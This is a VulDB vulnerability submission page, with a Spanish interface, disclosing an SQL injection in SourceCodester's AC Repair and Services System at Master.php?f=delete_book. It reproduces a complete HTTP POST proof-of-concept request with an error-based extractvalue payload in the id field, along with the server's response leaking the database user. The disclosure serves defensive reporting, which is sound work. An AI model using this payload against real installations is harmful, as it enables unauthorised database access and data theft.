Enviar #180827: SourceCodester AC Repair and Services System HTTP POST Request sql injection in Master.phpinformación

TítuloSourceCodester AC Repair and Services System HTTP POST Request sql injection in Master.php
DescripciónI find sql injection in Sourcecodester Ac Repair And Services System(https://www.sourcecodester.com/php/16513/ac-repair-and-services-system-using-php-and-mysql-source-code-free-download.html).It is a sql injection in url/classes/Master.php?f=delete_book. POST /php-acrss/classes/Master.php?f=delete_book HTTP/1.1 Host: localhost User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/115.0 Accept: application/json, text/javascript, */*; q=0.01 Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2 Accept-Encoding: gzip, deflate X-Requested-With: XMLHttpRequest Content-Type: multipart/form-data; boundary=---------------------------25039842273186474810708140780 Content-Length: 906 Origin: http://localhost Connection: close Referer: http://localhost/php-acrss/admin/?page=bookings/manage_booking Cookie: PHPSESSID=sg18q6cststuaq0t07v6hdppgc Sec-Fetch-Dest: empty Sec-Fetch-Mode: cors Sec-Fetch-Site: same-origin -----------------------------25039842273186474810708140780 Content-Disposition: form-data; name="id" 1' or (extractvalue(1,concat(0x7e,(select user()),0x7e)))# -----------------------------25039842273186474810708140780 Content-Disposition: form-data; name="fullname" 1 -----------------------------25039842273186474810708140780 Content-Disposition: form-data; name="email" 1 -----------------------------25039842273186474810708140780 Content-Disposition: form-data; name="contact" 1 -----------------------------25039842273186474810708140780 Content-Disposition: form-data; name="address" 1 -----------------------------25039842273186474810708140780 Content-Disposition: form-data; name="services[]" 1 -----------------------------25039842273186474810708140780 Content-Disposition: form-data; name="status" 1 -----------------------------25039842273186474810708140780-- And it returns "{"status":"failed","error":"XPATH syntax error: '~admin@localhost~'"}".Obviously, there is an error injection vulnerability here due to insufficient filtering of the id parameter.My suggestion for modification is to use mysqli_real_escape_string() to protect controllable ID parameters from malicious exploitation by hackers, resulting in SQL error injection
Fuente⚠️ https://www.sourcecodester.com/php/16513/ac-repair-and-services-system-using-php-and-mysql-source-code-free-download.html
Usuario
 fushuling (UID 45488)
Sumisión2023-07-11 17:42 (hace 3 años)
Moderación2023-07-13 11:49 (2 days later)
EstadoAceptado
Entrada de VulDB234012 [SourceCodester AC Repair and Services System 1.0 HTTP POST Request Master.php?f=delete_book ID inyección SQL]
Puntos20

AnteriorVisión De ConjuntoPróximo

Want to stay up to date on a daily basis?

Enable the mail alert feature now!